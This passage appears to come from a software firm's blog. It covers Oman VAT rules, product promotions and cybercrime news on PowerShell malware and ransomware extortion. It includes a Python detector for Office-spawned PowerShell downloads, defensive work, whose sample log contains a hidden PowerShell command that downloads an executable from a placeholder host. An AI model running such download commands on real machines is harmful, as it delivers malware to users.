Certain charges which are penal may have a different VAT treatment. In the majority of transactions, Islamic finance products will follow the treatment of non-Islamic finance products; however, there are some exceptions. The financial services sector may have a substantial portion of income which could be exempt, so input tax apportionment will be required.
Logistics sector: International transportation, i.e. movement from Oman to outside Oman and vice versa, is zero-rated, whereas local passenger transport is exempt and local transport of goods is subject to VAT at 5%.
However, the entire transportation journey involves freight forwarders, agents, shipping lines, feeder operators, etc., so businesses should ascertain the VAT impact on the different charges for providing these services. More clarity is expected from the Executive Regulations.
Export of services: Providing services to a customer based outside Oman is zero-rated subject to certain conditions. One important condition is that the benefit of services should accrue to the customer outside Oman. In other words, benefit should not be received by any other person in Oman. This may be subjective and depend on the arrangement with the customer and the nature of charge / services. It is advisable to identify such arrangements and to evaluate the VAT treatment. Other GCC countries are divided in terms of VAT treatment on such transactions.
It is likely that sector-specific guidance will be issued by the Oman Tax Authority to clarify the VAT treatment for different industry verticals.

Exempted Supplies from VAT
Some supplies will be exempted from VAT based on the type of transaction, and others based on the nature of the product or service.
Supplies exempted based on transaction include:
• Any supplies transacted between the same group of the VAT group (e.g. a parent company and subsidiary or branches)
• Business ownership transferred by one taxable person to another
• Any insurance claims made within the Sultanate of Oman
• All imports made by Armed forces, Army, and Air force in Oman
• All imports made by diplomats, embassies, consular bodies, international organizations. (subject to conditions)
• Supplies imported for charities and not-for-profit organizations
• Supplies brought to Oman by travellers and passengers as gifts or personal use only
• All supplies imported for people with special needs, including medical aid equipment
In addition to the receiver or person utilizing the supplies, some supplies will be exempted from VAT by nature of the product/service:
• Financial Services
• All Health Care services including the imports of medical supplies and equipment
• All educational services including the import of supplies for educational purpose
• Resale of the Real-estate and leasing of real estate properties for residential purposes only
• Non-developed land i.e. empty or barren land
• All local means of transportation for passengers

Registration process

The registration process is likely to start in January 2021 according to the Tax Authority in Oman. All registration will be handled through its online e-services portal. The applicant will have to provide company ownership and business-related information. The information required to register with the portal may include:
• Copy of trade license
• ID card and Passport copies of business owner and partners
• Company’s Memorandum of Association
• Contact details, E-mail for registration and other contact details
• Bank account details
• The income statement for the last 12 months
• Nature of business and activities performed
Each registering entity will be allotted a VAT registration identification number other than their currently held tax number.

Filing returns
Article 72 of the law prescribes the following minimum information to be provided in the periodical return:
• Value of taxable and exempt supplies;
• Total value of imported goods;
• Amount of output VAT on revenue transactions;
• Amount of recoverable input VAT on costs; and
• Net VAT due for the period.
Article 73 provides an option to amend tax returns within a period of 30 days from the date of discovery of any error or omission.

VAT payment
VAT will be payable to the tax authorities within 30 days from the end of the VAT period, together with the filing of the return. Unpaid VAT will be subject to a penalty of 1% of the tax due per month or part month, unless waived by the tax authorities in accordance with article 82 of the law.

Mode of Payment
All entities subject to the VAT requirements will have to submit their VAT returns electronically through the E-Services portal.

VAT recovery
VAT recovery will normally only be possible where the recipient has received a tax invoice which adheres to the Omani VAT invoice requirements. These requirements include details of the supplier and recipient. Any VAT incurred on incorrectly issued invoices (e.g., wrong issuing party, wrong VAT rate and/or other missing requirements) may not be recoverable. Businesses operating in Oman should define policies to ensure proper VAT administration and invoicing.

A VAT group is a facility that allows two or more taxpayers to be registered for VAT purposes as a single taxpayer. The VAT group scheme is of interest to taxpayers with a restricted VAT recovery rate which is part of a group with non-restricted businesses. Inclusion of such payers in the VAT group may provide for (additional) VAT recovery.
Although VAT may be recoverable, the recovery itself generally takes a certain period of time. This cash flow aspect should be one of the considerations during the (re)negotiation process, particularly with large supply contracts spanning several years.

If you need advice on preparing for VAT and updating and automating your financial or ERP systems, we have implemented VAT for more than a hundred companies in UAE, KSA and Bahrain. We are Gold Partners for Microsoft Dynamics 365 Finance, Infor SunSystems and UiPath RPA.

Call us on 0097143365589

Dynamics 365 Dubai partner Synergy Software Systems

November 12th, 2020

There is much talk about digital transformation but what does it mean for your company?
For selected Enterprise clients we work with Microsoft to deliver curated workshops to ‘inspire-quantify-empower-achieve’.

Further to our recent seminar, contact us now to take advantage of free upgrade and migration reviews to Dynamics 365 Finance and Supply Chain.

Synergy Software Systems is the oldest Dynamics partner in the EMEA region and has implemented solutions on Axapta 2.3, Axapta 3, Dynamics Ax4, Ax 2009, Ax2012, Ax2012 R2, Ax2012 R3, and of course Dynamics 365.

We have also implemented every version of Dynamics CRM since version 3.

As Microsoft partners we also implement and support Office 365 and Microsoft 365, Exchange Server, Teams, and the Azure stack.

We also have a practice for Power BI/Power Apps/Power Automate, so we are able to help you to fully leverage the entire Dynamics 365 platform.

To take your business on the first step into the cloud with Dynamics call us: 009714 3365589

Massive increase in cybercrime.

November 6th, 2020

There was a disturbing increase in cyberthreats in the second quarter of the year: more than 400 new cyberthreats were recorded every minute, according to a new report from cybersecurity firm McAfee. New malware samples also grew by 11.5 percent for the period.

PowerShell malware and Covid-19-themed attacks dominated the landscape. Malicious Donoff Office document attacks propelled new PowerShell malware upwards by 117 percent. The documents behave as TrojanDownloaders: they use the Windows command shell to launch PowerShell, which then downloads and executes malicious files.
McAfee claims Donoff also played a “critical role” in driving the 689 percent surge in PowerShell malware in the quarter prior to this one.
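The Donoff chain described above (Office document, then the Windows command shell, then PowerShell fetching a file) leaves a recognisable parent/child trail in process-creation telemetry. The following is an added detection example, not McAfee's code or anything from this post: it assumes a simplified, constructed log format (one process-creation event per line with pid, ppid, image path and command line), walks each PowerShell process up its ancestry looking for an Office application, and raises the severity when the command line also contains one of an assumed list of download-and-execute markers. The sample log lines and the example.invalid URL are constructed for the demonstration.

```python
"""Detect Office -> cmd -> PowerShell download chains in process-creation logs.

Added example (not McAfee's or the post's own code). It assumes a simplified,
constructed log format: one process-creation event per line with pid, ppid,
image path and command line. The list of download-cradle markers is an
assumption; tune it to your environment and telemetry source.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe"}
TARGET = "powershell.exe"
# Substrings that commonly appear when PowerShell is used to fetch and run a file
# (assumed list; lower-case because matching is case-insensitive).
DOWNLOAD_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "start-bitstransfer", "-encodedcommand", "-enc ", "iex ", "invoke-expression",
)

LINE_RE = re.compile(
    r'^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) '
    r'image="(?P<image>[^"]+)" cmd="(?P<cmd>[^"]*)"$'
)


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


def parse_line(line: str) -> Optional[Proc]:
    """Parse one constructed log line; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Proc(int(m["pid"]), int(m["ppid"]), m["image"], m["cmd"])


def basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_chain(proc: Proc, procs: Dict[int, Proc], max_depth: int = 5) -> Optional[List[Proc]]:
    """Walk up the parent chain; return [office, ..., proc] if an Office app is an ancestor."""
    chain = [proc]
    cur = proc
    for _ in range(max_depth):
        parent = procs.get(cur.ppid)
        if parent is None:
            return None
        chain.append(parent)
        if basename(parent.image) in OFFICE_APPS:
            return list(reversed(chain))
        cur = parent
    return None


def detect(lines: List[str]) -> List[dict]:
    """One finding per PowerShell process spawned (directly or via cmd.exe) by an Office app."""
    procs: Dict[int, Proc] = {}
    for line in lines:
        p = parse_line(line)
        if p:
            procs[p.pid] = p
    findings = []
    for p in procs.values():
        if basename(p.image) != TARGET:
            continue
        chain = office_chain(p, procs)
        if chain is None:
            continue
        lowered = p.cmdline.lower()
        markers = [m.strip() for m in DOWNLOAD_MARKERS if m in lowered]
        findings.append({
            "pid": p.pid,
            "chain": " -> ".join(basename(x.image) for x in chain),
            # True when the Donoff-style hop through the Windows command shell is present.
            "via_cmd": any(basename(x.image) in SHELLS for x in chain[1:-1]),
            "download_markers": markers,
            "severity": "high" if markers else "medium",
        })
    return sorted(findings, key=lambda f: f["pid"])


# Constructed sample telemetry (not real data); example.invalid is a reserved test domain.
SAMPLE_LOG = r"""
2020-11-06T10:14:55Z pid=100 ppid=1 image="C:\Windows\explorer.exe" cmd="explorer.exe"
2020-11-06T10:15:00Z pid=200 ppid=100 image="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmd="WINWORD.EXE /n invoice.docm"
2020-11-06T10:15:01Z pid=300 ppid=200 image="C:\Windows\System32\cmd.exe" cmd="cmd.exe /c powershell ..."
2020-11-06T10:15:02Z pid=400 ppid=300 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -NoProfile -WindowStyle Hidden -Command (New-Object Net.WebClient).DownloadFile('http://example.invalid/u.bin','C:\Users\Public\u.exe')"
2020-11-06T10:20:00Z pid=500 ppid=100 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -File C:\scripts\backup.ps1"
2020-11-06T10:25:00Z pid=600 ppid=100 image="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" cmd="EXCEL.EXE report.xlsx"
2020-11-06T10:25:05Z pid=700 ppid=600 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -Command Get-Date"
""".strip().splitlines()


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f['severity']}] pid={f['pid']} {f['chain']} markers={f['download_markers']}")
```

Run against the constructed sample, the script flags the Word-to-cmd-to-PowerShell download as high severity and the Excel-launched `Get-Date` as a medium-severity parent/child anomaly, while the scheduled backup script started from Explorer is ignored. The parent-chain rule is the durable part of the detection; the marker list only adjusts severity, because obfuscated command lines will not always contain a recognisable cradle.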

Covid-19 was another theme exploited by cybercriminals in the second quarter of the year. McAfee’s network, which boasts more than a billion sensors, registered a 605 percent increase in Covid-19-related attacks compared to Q1.

“… a deluge of malicious URLs, attacks on cloud users and capable threat actors leveraging the world’s thirst for more information on Covid-19 as an entry mechanism into systems across the globe,” said Raj Samani, McAfee Fellow and Chief Scientist.

McAfee said there were almost 7.5 million external attacks on cloud user accounts in the quarter. According to the firm, all major industries were affected, including: financial services, healthcare, public sector, education, retail, technology and more.

In 2019, the Maze ransomware group introduced a new tactic known as double-extortion, in which attackers steal unencrypted files and then threaten to release them publicly if a ransom is not paid. Other ransomware operations began to create data leak sites used to publish victims’ stolen files. As part of this double-extortion tactic, most ransomware operations require a victim to pay a single ransom that provides both a decryptor for their encrypted files and a promise not to share, and to delete, the stolen files. Some ransomware operations, like AKO/Ranzy, demand two ransom payments: one for the decryptor and another not to publish stolen data. Ransomware gangs are increasingly failing to keep their promise to delete stolen data after a victim pays.

In the recently released Coveware Q3 2020 ransomware report we learn that some ransomware gangs do not keep their promise to delete stolen data after a ransom is paid. Certain groups are leaking stolen data after a ransom was paid, using fake data as proof of deletion, or even re-extorting a victim using the same data they were paid not to release.

Sodinokibi: Victims that paid were re-extorted weeks later with threats to post the same data set.

Netwalker: Data posted of companies that had paid for it not to be leaked

Mespinoza: Data posted of companies that had paid for it not to be leaked

Conti: Fake files are shown as proof of deletion

Unlike a ransomware decryptor, which a threat actor can’t take away once given, there is no way for a victim to know for sure if a ransomware operation is deleting stolen data after a ransom payment is made. Due to this, Coveware says that it does not make sense to pay a ransom as there is no way to know for sure it will not be used to extort you further in the future. With this in mind, Coveware tells victims to expect the following even if they do decide to pay, so their data is not released:

– The data may not be credibly deleted. Victims should assume it will be traded to other threat actors, sold, or held for a second/future extortion attempt

– Stolen data custody is held by multiple parties and is not secured. Even when the threat actor deletes a volume of data following a payment, other parties that had access to it may already have made copies so that they can extort the victim in the future

– The data may get posted anyway by mistake or on purpose before a victim can even respond to an extortion attempt

Companies should automatically assume that their data has been shared among multiple threat actors and that it will be used or leaked in some manner in the future, regardless of whether they paid. They should treat the attack as a data breach and properly inform all customers, employees, and business partners that their data was stolen as required by law.

Doing this may be embarrassing and painful, but at least the company looks better for trying to do the right thing, and it gives those who were exposed the ability to monitor and protect their accounts from fraud.

A recent example of such an attack is Campari Group, an Italian beverage company known for its popular liquor brands, including Campari, Frangelico, SKYY vodka, Espolòn, Wild Turkey, and Grand Marnier. It was recently hit by a Ragnar Locker ransomware attack, in which 2 TB of unencrypted files was allegedly stolen. To recover their files, Ragnar Locker is demanding $15 million.

As proof that they stole data, the ransom note contains eight URLs to screenshots of some of the stolen data. These screenshots show sensitive documents, such as bank statements, a UK passport, employee U.S. W-4 tax forms, a spreadsheet containing SSNs, and a confidentiality agreement.

Ragnar Locker claims to have encrypted most of Campari Group’s servers in twenty-four countries and is demanding $15,000,000 in bitcoin for a decryptor. This price also includes a promise to delete the data from their file servers and not publish or share it, as well as a network penetration report and recommendations to improve security.

Ragnar Locker has been involved in other large attacks this year, including ones on Portuguese multinational energy giant Energias de Portugal (EDP) and French maritime transport and logistics company CMA CGM.

We advise all companies to regularly review and update their security policies, training and cyberdefence solutions.
Ask us about endpoint solutions, or consider whether managed cloud-hosted systems are preferable.

009714336589